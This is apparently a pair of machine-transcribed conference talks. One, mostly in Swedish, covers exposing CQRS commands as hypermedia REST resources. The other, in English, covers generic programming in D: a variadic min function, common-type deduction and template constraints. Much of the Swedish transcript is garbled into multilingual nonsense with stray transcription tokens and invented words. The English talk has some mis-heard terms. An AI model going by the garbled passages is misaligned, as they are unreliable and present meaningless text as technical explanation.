ut som det här. Det var första liten. Vi kan navigera det här. Vi kan följa den liten liten liten. Klanen vet att om det finns en liten liten liten liten, kan jag göra det klickade. Jag kan följa den liten liten till den nästa liten liten. Vi är tillbaka till produkter. Vi har gått till produkter. Vi har gått till produkter. Nu har vi ingen liten liten liten liten. Vi har en liten liten liten liten liten. Nu är det ingen liten liten liten. Det är samma liten liten. Det är samma liten liten för denna liten, som det är för denna liten. Men eftersom API-stadsarens olika liten, ser det lite olika. På liten liten kan jag skapa en order. Det gör många saker på bäckens land. Många människa går tillbaka tillbaka. Vi ser vad det är. Jag har postat till... Jag har postat till order. Jag fick tillbaka till det. Det betyder att jag har det. Om du vill veta mer, kolla på api-slashorder. Jag har också skapat en order-stadsare. Det har passat till den liten liten. Det har börjat hända på bäckens land. Människa försöker att skapa api-order. Vi får tillbaka till 404, för det har inte varit skapat. Det har skapat. Nu får vi tillbaka till order. Orderen har inget annat än en liten liten liten. Jag ska lägga mer om det. En bit av kod. Vi ser på det. Det är den första liten liten. Vi får på api-slashorder. Det tar en listan av alla liten. Jag har också skapat en lämna på glandblocken. Och ett nytt lämna på imorgonlubb. HIMs i Yunh dollars. specified genom.ショ 윤h FE хотmi. Ett risk! Det pasti muralisens luftzepet! también skulle kunna avsnitts på화et i bankmanuset. I den här stampen kan du ta till dig och tradera. Existen kan vara en sjuki. I spendets matstrocken över sinker träffan på bordet av sjuta, nej, hos Nile flogrell creamy en algorithm att ta själv. Och. Ja, det är orders. Så de orderkontroller. De orderkontroller. Hatsa post. Var vi kreaten order så igen, vi har till haidt de seek i oss lär så post, vi ålderspatch. Det vill binda upp det Kreatörer kondom, 되s betet Och än Thaneケ på dorinet nat Jazpar De lo timeframe, än ämne kan jätte Gettutter operators men Torgtegryaley Weunett Dass uppö kernel. today things. Ok. Så fanny boş passengers. Med neither ways to go back to i fieldings 막 hàng braid det below. Tille,. crimes fung sink hope. Det kan bli nej. Det kan bli en resurs. Så varming att vi kan nejm i sarg kommands. Så varje dom för i träd till expose och kommands resurser. Så vi kan krävs en resurs kold sett shipping address för det sett shipping address kommand. Enligt vi gett back resurser, vi returner template till det. Det klient hästar filar ut. Enligt klient den posten, det template till det resursen. En disk dispatches till kommand. Du ser över en idrittans och location av det specifika kommand instans, där vi kan finna ut mår information om att diskommand. Så if vi gett dat kommand instans, vi kan return. Tingsläck. Vald, det kontent av det kommand, objusly, bäck, perhets. If det ska man dis är vi den processen i ett orsets till inflex. Orcom missämnd Gör<|sv|><|transcribe|> ut take prevented just någonting. Så, jag färgade... Om vi lägger digamos butt... och vi gick till produkt. produktleveln. Vi har en kommandlink. Så vi försöker faktiskt få den kommandet pulp fans manual. och t betövling soluverappa 요ahåb Paint mycket. Annau är god i ju retrievänd censur muscular dollars för ett. En radhet där personn结. Täls mer bättre till en ny spelJack command unit i order är det.ilian är det inte produkt tourists så klant i stor higit så frödes Fördu ensures. Can I click Add to Order, it will submit dispatch if it actually posts. Post. Let's see if we have it. So it... No, that's not it. There you go. So here, I've posted the contents, so I have the order ID and it's fart vill veta att to dyrta framtida ochきます att Maria med courtert dissertation men marijuana på ner så du kan få din liten bag på sitt när du flyger. Vi har ett sett booking-referenskommandet som vi måste kolla. Vi ska se vad det här ser ut. Vi ska få att hitta den templaten av den. Det är en templat som säger att de vill en ordning i id. Vi har det i kontext. Men jag behöver också en booking-referens. Men vi har inte det. Nu är kläderna bra att sätta att det är en av de här som jag inte har. Men det är en av de som vi har prompterat. Varför inte jag bara ordna det som vi har på dessa informationer? De pågår mycket åt areaverkning, och först finobaka att de gör det lite bra. Det förr fördelar den organizederingen vi gav. Did you see we got the submit button here? So that's, that's HATIOS. That's controlling the flow of the application using the links that we return. So now, since we have a reference number, we can actually submit this order. So if we look at the links to, from this order, we now also have the submit order command. Det är det vi kan, vi kan använda. Jag har inte implementat det där, så vi försöker. Ah, let's look at bit of code for that as well. Så det är ett item to order, has its own controller because it's exposing its own resource. You can issue a get that will return nothing in the contents. But since we're returning an add item to order, the collection plus Jason serializer or the formatter is kicking in and that has the template to the order. And if we post to it, we simply model bind the order command, make sure it looks okay, and then we dispatch it and return an accepted response with the link to the command. Let's continue. Few minutes left. So what are some pros and cons on these two different ways of handling your, of exposing your CQRS API? Well, exposing commands as resources is actually quite simple and you don't need to write a lot of code. You saw I had each command had its own controller, but you probably can refactor that into using a bit more reflection or just some generics to create those. We've been using this primarily for administration interfaces. So when we create a new service, we build up a simple API browser that allows us to look at a specific order or whatever it is and see which commands should this order be able to handle and then we can pass it commands without even having to create a client for it. So that's quite powerful. And also if we manage to return things like error messages and which events that happened as a result of this command, that's great for debugging because that's often a problem in CQRS that you issue a command and you have no idea what's happening. Then if you want to expose your API in public, if this is something that's going to be used for a long time by many different people and you want to be rest, you want to use hyper media the proper way, then making your clients in the way that I did with alert pop-up boxes or things that just display stuff from the command is probably not a good idea. You need more control in your client. But perhaps you don't want to have, one way of course is to make the client know about each and every command. But that may be a bit too far because now you can't introduce a new command without having to, well, adding that to the client as well, which sort of defeats some of the purposes of rest and hyper media in particular. So on a public facing, completely awesome rest API, you'd probably want to go the first way. So hiding your CQRS solution. Any questions? Ja. It doesn't have to be too bad because in a real system you'd probably cache the templates. So the client issues one request for the template at start-up or the first time it does it and then it's just in memory. So probably not a lot, at least not compared to all the other things that happened in the CQRS application. No more questions? Ja, ja, ja, let's do this. Since it's a hyper media talk, we need links. So some things to look at. If you want to know more about CQRS, just get an introduction of what is it. Then Greg Young's talk from Oradev is fabulous, Unleash your domain. Have a look at it. Also Microsoft Patterns and Practices has a great book where they build an entire CQRS-based event sourced system called the CQRS journey. Det är free on the web. Obviously, you could read the boyfield of dissertation if you're having trouble sleeping. Or if you want to know more about the maturity model, Martin Fowler has a great post on that. If you're more into reading actual books, Rest in Practice is a great book that discusses Сегодняs緊 utsatta fehler Shengsli stepen i tra Dublin foolish Becdem nam prescribek SCR Jag har inte nåt. Stå i den här rumen för ett månad eller två. Just att skriva. Det kommer att vara väldigt intressant att följa. Så kolla på det här också. Och för mig, om du vill kolla på koden, kan du checka ut min github-repot. Det heter Reststore. Och avklart, min blogg är hoppande att bli uppdaterad med det här. Följ mig på Twitter. Och om du är i Stockholm på tredje morgon, kom till Kodkaffe. Vi möter upp allt tredje dag. Vi har koffe och talar om koden. Du kan följa Kodkaffe på Twitter eller bara pinga mig och så. Jag ska lära dig att veta vad du ska fina. Okej, tack.
|
Many schoolbook examples of RESTful APIs are simple CRUD designs where you read and write using the same model. This however goes against all the principles you adhere to when doing CQRS, where you often have completely different models for reading and writing. In this session we will take a closer look at the problem and find a way to handle it without compromising too much.
|
10.5446/51537 (DOI)
|
I think we're ready to roll. Okay. So I landed at Oslo Airport yesterday and I paid half of my credit limit for the taxi after which I got here. I was really thirsty. So I go to the water place and then this lady who's like, you know, what would you like? And I say, I would like some cold sparkling water. She's like, oh, right on. This is awesome. It's like choosing one of those two choices was a genial idea. It was just perfect. A strike of genius there. And she gives me water like I've been like for the last six months in Sahara. So she was incredibly courteous and nice about it. So I can only assume that, you know, Norwegians are all nice people and that that bodes really well for the stock. So hello, Norway. I'm Andre Alexanderesky. I work for Facebook and I'm going to talk about the deep programming language. First of all, I'm going to discuss generic programming. So before that, in fact, let's take a quick show of hands. How many of you actually use a language such as Java, C-sharp, C++ or derivatives? Okay. So it's a kind of quite targeted audience there. This is awesome. For that matter, so how many of you is C-sharp in particular? Because that would be sort of the second. Okay. Great. So that has quite, let's say, okay, mechanisms for generic programming. So let's try to define it. I'm going to go a lot by interacting with you guys. So you feel free to not only interrupt me and ask questions, but actually interrupt me and, you know, make points, help my talk and make it better. So what is generic programming? How do you define it? You know, because C-sharp has generics. Java has generics or at least what they call it. So essentially, what would be generic programming as, you know, as an area of interest? Any ideas? Yes. Yeah. Yeah, it's like, let me think. Yes. Type? Type as parameters. So that would be a sort of a mechanism part of generic programming. Let me attempt to give my own definition because it's many things to many people. So in my opinion, it's an activity. And it goes like this. Well, we want to find the most general representation of a given algorithm. Searching, linear search, binary search, ternary search, there is such a thing. Sorting, grouping. You know, all of the classic SQL, algebra elements, all of that good stuff. These are activities. Like, you know, let me take an algorithm and find its most general representation. So what's the most general representation? That uses a minimum amount of primitives. Like you go in math and say, you know, the angles of a triangle sum to 180 degrees. But that's the consequence of how many axioms. Does anyone know how many axioms? I remember very vaguely there's four and one is like the axiom of parallels which, of course, I've proven in the sixth grade and my teacher was like, oh my God, Andre, what's wrong with you? So you define in terms of as few axioms as possible, as few primitives as possible. Like, you know, what's the minimum amount of humanly possible data structure that can actually sort? Right? So you narrow the requirements down. Let me see if I have a laser here. Apparently I don't. So you make the national requirements. Why does guarantee sort of the best sign of fan in fan out ratio you can ever find? And by the way, big encapsulation should be a crime in 52 states and in Europe as well. European Union, Norway, you know, everywhere. It should be a crime. And here's why. Actually, I was very happy. I was sitting in disclosure talk just earlier today and, you know, the speaker made a point that these are constant time operations or these are log time operations and that's great because a major issue with encapsulation of Big O is that essentially it makes it extremely easy to get to quadratic performance which is, so quadratic on big data is essentially it's, you know, you don't do that, right? If you do need to do quadratic on large data, it's very explicit. So, you know, I'm going to use a quadratic algorithm with the following, you know, with the following improvements and sort of, you know, amendments and, you know, qualifications and whatnot. So it's quadratic but we kind of do it because we have to, like, you know, do like this matrix operation and whatnot. But sort of, you know, getting from linear to quadratic is a very easy step if you claim that you can access the nth element of a list with a primitive, say, oh, yeah, I know how to get to the nth element of the list. I have to just go every step to the way and then people are going to use that as an index, you know, loop and that's going to be a disaster. Do you agree with this? Big O encapsulation should not, people should not do that, right? I'm very happy to see that happen because, like, when lists started, lists said we're going to do everything with lists which is fine because it's going to, lists are going to be able to represent every data structure in the universe and they omitted the comma and what comes after, comes after which is with a blow-up in polynomial blow-up in access complexity, you know, in time to access. So that polynomial blow-up is actually very important. All right. So hope I convinced you that, you know, that's something not to do. And you don't need to regress to handwritten code. This is also very important so you should leave no room below your abstraction and unfortunately my main abstractions kind of do that. They're like, you know what, I'm just going to not, not even claim that I'm about as good as handwritten code. If you really want speed, you got to redo this wonderful algorithm by hand in your own terms as opposed to reusing my abstraction. So these are sort of, this is like, you know, a nice definition of generic program and find the most general presentation of an algorithm and go ahead and implement it. Then you define the appropriate data types that implement those requirements, right? And finally, you're going to leverage the algorithm for ultimate reuse on whatever data structures you're, you're, you're having to have. And ultimately you're going to make a big profit out of it. And well, so that last part depends on your entrepreneurial qualities and whatnot. But this is in my opinion what generic program is all about. And I would add that for me personally, this is, this is one thing I want to do. If computer science is about algorithms, then this is it. This is the beast needs. This is what I want to be. This is what I want to do. This is what, this is kind of something that's important to my life, right? So I want to kind of, oh, okay, so CS is about algorithms and all that good stuff. And generic program is about finding sort of the axiomatic representation of algorithms and structures. And therefore, you know, I want to be there. I want to be part of it, right? So I would argue that this is an important thing. Now you know the classic quote and I kind of, to change a few words in it. I said, you know, premature optimization is the root of all evil. I kind of changed a few words to make it like a weird, premature encapsulation is the root of some derangement. I didn't want to, you know, make it like all evil. I just wanted to be more reasonable about it. Premature encapsulation being exactly this kind of thing. You choose to encapsulate something in a, you know, in a data structure, sort of a generic presentation and you get to, essentially there's friction all the way. So this is sort of a problem. Like, whenever encapsulate there's going to be this inevitable friction and when you compose these mechanisms together, the friction is going to just add and it's going to create problems for the users. Now let's work on a very simple warm-up question and it's going to be very familiar to all of us. It's like, yeah, you know, I want the main function that takes them to numbers or more and it's very surprising that in this day and age, I mean, we've been doing like computing for what? Like, I don't know, 75 years now and it's kind of weird that people still need to discuss a passive one and this should be a solved problem. The simplest possible algorithms one can invent and it's kind of amazing that they still debate like, you know, how do you do a minimum? Oh, here's what you do and you know, don't care about that but, you know, that's going to be inefficient and that's going to be like impractical or that's going to be, you know, not difficult to use. So you know, the dream mini function would be, well, let me take the, you know, minimum of many arguments as many as I want, I want to take minimum of AB whatever. I don't want to, you know, have a nonsensical code of minimum of one element or zero elements, right? I want to work for all ordered types and conversions. So I want to take the minimum of an integer and a floating point number and what should that give me? The minimum of an integer and floating point number, what type should that give me back? This is a test you're listening. Yeah, okay. The gentleman says floating point number. Yeah, so you've got to kind of, you know, fall back to the most general of the two. You can't think of a sort of inclusion polymorphism there. How about the minimum between an assigned type and an unsigned type? So this is going to be more interesting. Yeah, so, you know, it kind of gets into the, into discussion already. It sounds like we're debating here, right? What the hell is going on here, right? So how about the, you know, a simpler one. The maximum between a signed type and an unsigned type. How about that? That's easy because the maximum is always going to be unsigned since one of the, one of the branches is unsigned, one of the elements is unsigned. So definitely it's going to be greater than or equal to zero and therefore I'm there, right? And then it comes to, you know, the whole discussion about size and all that stuff. Like, can I represent everything representable? So we get into this interesting notion which is, you know, which, you know, somebody who's into dynamic typing, you know, they kind of, I lost them at the title of the slide. It's like, yeah, I know how to define me. It takes me one line and I don't care about types. Like zero, I have zero concern, can take the minimum between a string and an apple and a banana and an orange if I so want. And it's going to give me something that I don't care much about the type. But here we're firmly anchored in a realm where we do want to be able to do such judgments, right? Prior to runtime, we do want to issue such judgments. And interestingly enough, it turns out that minimum maximum, two functions of which type depends on the types of the input in interesting ways. Because again, the maximum between an assign and assign is unsigned and that doesn't apply to min. So they're not equivalent in a sense, right? So all of a sudden we get into a universe where weird things are happening and these very simple primitive functions are worth talking about, right? I can only hope by the time we all are very old and crutchety and, you know, we don't care about like, yeah, I used to be a programmer, I don't care about it anymore. You know, I have a pension, whatever. So at that time, I hope there's no good, there's nobody's going to talk about this. Because yeah, I know, you know, min, it's like there, everybody has it, everybody uses it. There's no more controversy surrounding it, right? Okay. So not to work for everybody and we want to decline incompatible types without prejudice, right? Let's see how we can do that. So indeed, we have very nice and essentially like we wanted to take generic programming C++ C sharp style and make it like absolutely trivial to use. They should, essentially it's an embarrassment to not use it because it's so simple and it brings you so much more generality. It takes just a couple of characters more than writing min for ints or for floats or for doubles. I say well, min of left type and right type LR, they could be different as I just said. So I'm going to take left hand side, right hand side and I'm going to do the classic switcheroo. But here's a question for you guys. Why did I put RHS less than LHS and you know, usually you would put like LHS, left hand side, less than right hand side. Why did I swap the two arguments? All right, who can tell me this is going to get the following. I have here some delicious handwritten cards, invitations for one person to the Facebook party. It's going to be an open, you know, happy hour event. Six to eight tonight. Free food, free drinks, free chat. There's no pressure like, you know, you got to apply to Facebook or whatever. So you get at a very hip location in Oslo, which is within walking distance. So here they told me not to tell you because then everybody's going to, you know, kind of lynch me and destroy me and get these cards, okay? So who answers this question is going to get one of these cards and I have a few more. So let's see, why did I swap the order of RHS and LHS? Because the intuition is like, minimum of A and B is, oh, is A less than B than A, otherwise B. Okay. Oh, come on, I'm going to go along to the party. All right, so here's the answer. The answer is stability because you could have types that are partially ordered. And what I'm saying here is, well, in the case, so I'm going to swap the order of LHS and RHS, only if RHS is positively less than LHS. And in all other cases, including the case in which they are not ordered, I'm going to preserve the order of returning LHS, the left-hand side. So this is sort of a solid reason because, for example, if less than is like some string insensitive comparison, you want to kind of, you know, keep the left guy by default and return the right guy only if they're really ordered. So this is sort of an interesting little detail and it's amazing, again, that we need to still talk about this. This invite remains open. So I'm going to give one for each good question I get and, okay, all questions are good. All right. And by the way, so the other speakers told me, like, Andre, you know, Norwegian people are really socially shy. They don't ask questions and stuff. So in America, I would have gotten like a million questions already. And he's like, I'm getting some chakras, which is good. It's a good sign. But let's ram this up. And by the way, to ram this up even further, I have this wonderful Facebook t-shirts, which I'm going to get for really good answers, really good questions or really good answers for that matter. So let's ramp it up. So far so good. So we have the first min, which is like a two-liner as expected. I mean, I wouldn't expect it to be any longer. But the nice thing is that we have two genericity here. The code expands to different functions depending on the input types, which means it's just as good as you typed it by hand, right? The counterargument there would be, well, yeah, I have too many functions now. So it's big code. There's a lot of bloat there. And there are like compiler techniques to avoid that and to kind of merge a lot of instantiations into one and stuff like that. But for a function this short is going to be in line. So actually typing min of A and B is going to be just as good as actually typing A less than B, blah, blah, blah, blah, with one evaluation for A, one evaluation for B, which is perfect. All right. Well, let's make it, let's kind of ramp it up, take it once the further. Let's make it work for more than two arguments, any number of arguments. Because I can take the min of four numbers and that's entirely reasonable. So we have this very nice variadic feature there. Oh, look at that. So I have this very nice variadic feature. I say, oh, you know, min of t's dot, dot, dot, and I'm going to take a list of t's x and that's a sort of a compiling construct. And I'm going to do something very interesting here. Let's say, well, during compilation static if, so during compilation if I happen to pass more than two argument, I'm going to recurse. Right? So I just, you know, just classic recursion, right? Min of the, the min of the first two and then the rest. This dollar is like, you know, go all the way through the last element in the, this slice, right? So take the min of the first two and then, you know, the rest of them. Now notice that this works only, this, this applies only if the length is strictly greater than two, which means that x of zero is well defined, x of one is well defined, and these guys are well defined. Very nice. Well, otherwise I know what to do. I already had it on the previous slide, right? Just take the, the min of two elements. So well, now I can write a min of a plus b, 100, and c, or whatever I want. And there are two interesting things, things here to note. Number one, we're not dealing with arrays here. And that's important because arrays already kind of bind into a specific representation, into specific operations, into specific, specific way of doing things. This is, these are not arrays. These are compile time arrays, if you wish, which do not have a kind of, you know, representation as arrays during runtime necessarily. So these are just sort of lists of types and lists of values, which is really nice. And I get to do operations during compilation, I get to do operations during runtime. Some more, and this is probably even more interesting, this is not classic recursion. So even if it says, okay, let's look at the word min, how many times we have it? One, two, three, three times in the definition only. But each of these three names is a different thing, which is nice because I use the same, I use the name for the concept, not for the, you know, for the incarnation of the concept. I will go crazy if I had to define like min one, min two or whatever, right? So this is not recursion because each of these sort of sub, you know, sub invocations of min is on a shorter list of arguments, right? So I call it for, you know, the min, the big min is like, you know, I kill it for 50 arguments if you so wish, let's say five arguments more reasonable. But inside is going to recurse, pseudo-recurs back to minimums of smaller sizes. And those minions are going to be different instantiation of the same thing. And each is going to have its own address if you wish, it's going to be its own function, right? So all of a sudden I have this notion that I recurse during compilation, but it's not a runtime recursion. And that's good because it's efficient, right? It's as if I, again, as if I kind of sit down and write the comparisons myself by hand, right? And I have the stack, if min were like all of them in space, that would be terrible, right? It would be like kind of a shameful thing to have, right? So very nice. All of a sudden I got min for many arguments. Questions so far? Yes. Yes. I'm sure for God's sake, what's your consideration of stability? Haven't you forgotten to consider stability? Okay, let's see. What's your name? Michael? Michael. Michael, let's see. X0 greater than, no, because this is min and this is greater. So I kind of, you know, okay, let's notice this. So I hear you use RHS less than LHS, and here I use X of 0 greater than X of 1. So it's the same thing just I wrote it the other way, just to confuse people like you. All right. You see what I'm saying? Yeah, so essentially what I'm doing here is like, if X of 1 is definitely not a problem, definitely less than X of 0, then I'm going to return X of 1, which is kind of the weird thing, and in all other cases I'm going to return X of 0. So well, I think the discussion on stability would be more interesting with a better operator because min is kind of, you know, what you see, what you get. Nevertheless, Michael, congratulations. Thank you. I'll see you tonight. You got a date. All right. If you use functionality before you have two slides, I can tell you a little bit. Uh-huh. Ah, the news function, you deserve a card or a t-shirt. What do you want? It's such a good question that you deserve either what do you prefer? You want a t-shirt? Yeah, I'm checking a flight. Oh, okay. Never mind. Okay. So the question was, well, you have one t here, which means you kind of lose the nice, remember like LR, like, you know, inflow or, you know, unsigned in whatever, right? So it could be like nice things here, but here kind of losing that. Well we're not, because t dot dot dot means a list of any types. There's one name for it, but it's a list of any, you know, you can have inflow, double, unsigned, char, whatever, right? So that's nice. So this t here stands for as many types as you want. And whenever you refer to x of zero, t of zero, whatever, it's going to kind of instantiate the thing with the appropriate type. So it all holds water. Yes? Could you mix variables and list of variables here? Come again? Could you mix? Could you mix? You're calling, you're putting variables, right? Because it's going to be five, a hundred, one kind of. Right. Could you put in a list there as well? A list of variables? A list of variables. So, okay, so here in this case, t stands for a list of types. So I can say t at zero, t at one, t at whatever. And x stands indeed for a list of variables. And indeed, x of zero is like one variable. And what was the sort of the, where we're driving at? What was the sort of ultimate? You can recall, you can recall a function, which is all m, which was named, you know, 300 and c, right? Yes. What if you put a list in the function call? What if you put a list in the function call? In that case, if you just, if I just put like, you know, let's say min and I, min, IMP or whatever, and just pass x into it, then it's going to be automatically expanded. So it's going to, there are other means to encapsulate things like that and kind of keep them together and expand them explicitly. And actually that's kind of a cool thing to, to deal with for which reason you deserve a card. I actually have a hard question. Yes. Oh my God. You want two cards? You have a girlfriend? Thank you. You could have a list of lists, right? Why wouldn't you just write a for loop? If you have lists, yeah. We could write a for loop. This is just the same because you have a static for each. So you have a static for loop that you can use. I wrote this because, you know, a function from is cool and everybody's into that. So if they say like, oh, for each one, you know, back in the 70s here. So you know, this is, oh my God, this is awesome, you know. So yeah, you could use a loop as well and it would be, there's a way to write a static loop and it's going to validate, expand in compilation. Great. Yes. What happens if you call min with just one argument? What happens if you call min with just one argument? Are you in town tonight? You got a date. Feel free to pick it up later, okay? So just a second because I didn't answer that. I gave him a card that doesn't, you know, preclude an answer. So right now we're not good there because you can call min with like zero arguments or one argument that's going to kind of explode. It's not going to do well because, for example, like for, if you go with an argument, this guy is undefined. What the hell, right? Yeah, you're going to get the compile time error, but it's not going to do well because you're going to get the compile time error, but it's not going to be like, essentially I consider it failure of defining min properly. So you're ahead one slide or couple of slides. Yes, question in the back. If you're dealing with a clause language and you would probably go in a library. Yes. That is correct. So the question was, the question was, well, number one, D is a compile language and presumably going to put min in a library, which is, so you can just Google for D program language like D lang min, you're going to find it. And if two applications are using min, or if one application happens to use like a million min or whatever with each with different number of arguments, which is kind of weird, it's not going to happen, but, you know, see what I'm saying. So there's going to be some binary code duplication there, right? So yes, you can't put min in a dynamic library. This min, you cannot put it in a dynamic library. This is a sort of an interesting trade-off. It's the other side of the trade-off, which is, well, if you want generic and if you want kind of expansion in compilation, all that good stuff, you can kind of encapsulate that in a DLL, if you wish, and kind of make it the same code, the same binary code available to everybody. So there's sort of, there's two extremes in this spectrum, and this is at the end of the spectrum is like pretty much everything is done in compilation, and it's as if you write the code by hand. And there's, of course, techniques that take you to all the way to the other end, which is, well, I want to actually write the function and lose some of the benefits, but at the same time gain some better binary reuse. So these things are fundamental intention. Are you in time tonight? Okay. T-shirt? Okay. All right. So, so far so good. There's one more question down here. Okay. Up there? Okay. Let me know. Yes? Is there any way to enforce such a sense in the veritable argument? Is there a way to enforce that T is actually all T's, you know? Yeah. Actually, there's a predicate called all satisfy, which is implemented in the library, and it's, you know, all satisfied T's and or whatever. Okay. Awesome. All right. So we're at, you know, you were on slide ahead because we want to reject nonsensical calls. We want to say, well, I'm going to accept min of T's, only if the length of x is greater than 1. And here we stumble upon a very interesting feature of D, which is I can restrict statically any function I want in any way I want with anybody predicate. Right? So all of a sudden I can say, well, you know, I want to take min only if the length of these guys is 1, and if not, min just disappears. There's no min for one argument or zero arguments. It doesn't exist, right? Because it kind of, you know, takes it away from the food chain, which is nice because if I, at some point I want to define for whatever reasons my own function min that takes one argument, I could do so because this min is not going to compete with that guy. Right? So this is sort of good encapsulation of modules. So I just said that. And you know, of course, we need to do more work, which would be sort of some sort of interesting thing to talk about. Like, well, I want to kind of say if x length is greater than 1 and if, so, all satisfied T's a numeric type or it supports comparison and all that stuff, so you have to only accept types with a valid intersection, and we only want to accept types comparable with less than. Right? So you know what? Let's actually dive into this a bit because I think it's interesting to know about. Right? So I'm going to throw a wall of code at you here, which is not that difficult, so bear with me. So the task is given a list of types, the T dot dot dot. Let's find the common type of them all. So let's find the sort of the least common denominator type of a list of types. It's kind of interesting. Like, you know, if you think of it like I'm giving a bunch of types and it's like, find me the type that everybody converts to. Right? Huh. So, well, if I have one type, then my job is very simple. I'm just going to return the first type, the first and only type. Otherwise, if I have more than one type, well, let me kind of do this very funny construct here, which is type of an expression. And the type of an expression is going to take the expression, not evaluate it because it's all, this all happens smoke and mirrors during compilation. This is not going to, oh, I'm running this and I'm going to evaluate that and it's going to try that and it's not going to work. It's going to throw or whatever and then I'm going to fail. Now, this is all during compilations. The compiler is like, oh, let me test the type of the conditional expression like true one. And if it's true, then I'm going to return the first type in it. Otherwise, I'm going to return the second type in it. And this anything is giving the initial value of that particular type. So this is actually a value of type T zero and this is a value of type one. When you do the question mark operator against two different types, what you're going to get as the type of the whole expression, they're common type. Because like in C sharp, if you take the, you know, condition, floating point number and integer, you're going to get the floating point number and so on, you know, objects, it works like, you know, actually they find C sharp finds the common ancestor, the close, the, you know, the best common ancestor of two types, which is kind of very nice, amazing, right? And this is very nice. So essentially with this operator being designed so well, right, you get to actually use it during compilation to figure out the type, the common type of two guys. So wow. So at this point, I'm, well, I'm greater than one. And I'm going to say, well, if this is actually a type that works, and I'm going to call it you, then oh, okay, awesome, I'm going to make progress here because I'm going to recurse to common type with you and the other types in the list. And I'm going to alias that to common type. And if nothing works, I'm going to say, you know what, I'm going to give up. And the common type of these types is void, which means there's no real type that's going to work there. Right? Okay. So let's recap. If I have one type, it's obvious. If I have more than one type, I take the common type of two types by the magic of this type of expression. I give it the name you. And if that works, I'm going to say, well, then common type is the common type of these two types and then the trailing other types. So recurse, right, in a way. And yeah. What does the? What does the? The bang. The bang. Oh, the bang is template instantiation. So C sharp chose the, you know, angle brackets. C plus chose the angle brackets. There's any amount of pain that has been caused to parcel rightness and developers because of the angle brackets. And D went like, you know what, I'm going to instantiate with bank brands. So that's how we roll. Okay. So let me note something. Let me, this is sort of a unit test. Well, Steadica said that the common type of in short and long is long. So let me make, take a break here and make sort of a side point. This is the kind of stuff that developers like, you know, as I'm, I want to get work done in this language, right? This is the kind of work that developers don't care about that much. It's not typical. Like, oh yeah, at my day job, I figure out the common type of three types. You don't do that, right? This is the kind of stuff that who's worried about, like who's doing this stuff? What kind of people? Like, who, who, who, right, what? Compilers. This is the kind of stuff that the compiler writer is going to be busy about. Yeah. During my compiler work, I need to figure out, I'm given, I mess with types all the time. So I need to take, yeah, the common type of these two types, I know, I don't know what it is, right? So this is the job of a compiler writer. And the fact that, and it's actually in the compiler, it's not in user code, so it's, it can't be part of the target language that you're using. So we're getting to this really weird thing. And it's good weird, I would argue. We're getting to this weird thing where you do type manipulation, kind of compiler grade, if you wish, right? Kind of, you know, compiler, I'm a compiler pro and, you know, I'm kind of doing compiler things. But, you know, it's not really compiler stuff because you're doing it in the target language, in D. You're not doing it in the decompiler, which may be written in other language. You're doing it in the library, in there, in the target language. And you're manipulating types and kind of figuring out things about types and interest in this introspection kind of thing. And it's all static and it's all great. So this opens up a lot of nice possibilities. Like, you know, the D standard library has a bunch of, you know, traits like that. It gives you the common type of types. It can, here's a nice one. For mocking. You know what the white hole is? White hole. White hole is like you have an interface. It has an influence, like it defines, like, you know, seven methods or whatnot. And you find a white hole, which is the opposite of a black hole because it rejects everything. So you find a class, which is an implementation of the interface and whatever you call, it's going to throw an exception. That's a white hole, right? And it's used in testing and in, you know, people use it for mocking and for things like, you know, I want to implement just one function of this interface. I don't care if the other should throw because I don't implement them, right? So I see not. So I see people kind of having seen that. And actually in Java, it's an idiom. Like people say, oh, yeah, I went into a white hole here and people are in prayer, like, they're like, yeah, I have a white hole here. And in other languages and so on. But it's all done by hand. So it didn't even occur to people that, oh, actually that's an automatic thing to do. Right? And why didn't it occur? Because it's the job of a compiler writer usually to do that kind of stuff. Yeah, let me kind of add a feature to the language that implements this white hole thing. Right? However, in D, there's a white hole thing that's, that uses completely like standard features of D that are available to all programmers. And it's kind of very interesting that you get to implement such things, like for each member of the class, generate a function that's going to throw an exception. This is pretty cool, right? So okay, parenthesis closed. Yes? If the contract of the interface should not throw, then you have no business throwing. That would be a programmer error, right? Because it shouldn't instantiate the white hole with that interface. But it's a good point. And in Java, it would be better off because you have the checked exceptions and all that. So anywho, that's a good point. Well let's use this common type guy. So we're back to many of these whatever in the length of the list has to be greater than one. And then we say, well, type of the common type of T dot in it less than common type of T dot in it is bull. So what I do here is I take the common type of all these and I create the value from it by means of dot in it. So dot in it means, you know, give me the default value of that type. Like for instance, like dot in is like zero, right? And for characters, like, you know, all ones because that's an invalid character and that kind of stuff. And for floats is nan and that kind of stuff. So but I don't care about the value here because it's all compile time stuff. So I say, well, let me take the type of common type of all these dot in it is less than common type of all these dot in it. And that type is got to be bull because that's what mean asks for. And in these two lines, I got to say the types have a common type actually in fact, it's not void. And the types are comparable. And you know, there's more than two, more than one, right? So we have this nice Boolean condition and then with the body is the same. But this point, we got actually we got like full bore because it's the mean that, you know, this is what I wanted in the first place, right? So I kind of have satisfied all of my requirements. So again, it's amazing that we need to talk about this. The fact that different languages take so wildly different stances on this, especially with regard to efficiency is a sort of, you know, it's a slap on the face of, you know, our community as software developers in general because a very simple thing to do. So I'm going to go back to this. You're losing the? Yeah. Okay. So I'm using a good point. So the point was you're here using the less than operator and here's in the greater than operator, right? Oh, not here. Sorry. Yeah. Wrong, wrong laser here, right? In D, they're equivalent. In D, using this is the same as because they're all boiled down to the same comparison. It's a good point for which reason are in town tonight. All right. Congratulations. Nice shoes. Yes. This is awesome. Okay. All right. So, yep. Okay. So this is a very good question. I'm going to repeat it in a second. I mean, time tonight. Okay. So the question was, well, if I have an unsigned internet named, it's weird. Let's say they have the same size for starters, right? They have the same size, 32-bit or whatever, right? 32-bit, one unsigned, one unsigned. Am I going where you want it to be? Okay. And then I want to take the min of the two and, you know, what's going to happen then, right? Well, I guess it's okay because Indy's going to be able to represent everything. The max, okay. So let's switch to max and now I have an unsigned and I have a signed and I take the maximum. What's going to happen next? Who can represent everything? The unsigned guy is going to be able to represent everything. So if you return the unsigned, you're in good shape already. I think the problem comes when you try to compare an unsigned 32 to a signed 64 and then you get into problems. You have a common type between the unsigned and the unsigned. Well, Indy has the following principle. So you know, the question was like, what's the common type of signed and signed and stuff like that. So D follows the following principle. It's quite similar to C, like there's like a large part of D that's similar to C and kind of inherits in many ways. And therefore, people, people, it's a practical thing. People take a bunch of C code and they put it, they throw it in a D file and they hit compile. And then we have two traces. We succeed to compile, oh, okay, the simpler one. We fail to compile and that's fair because there's stuff that, you know, this is too unsafe for us, you know, it's not our taste, not our cup of tea, too unsafe code, whatever. That's fine. But let's say we succeed to compile 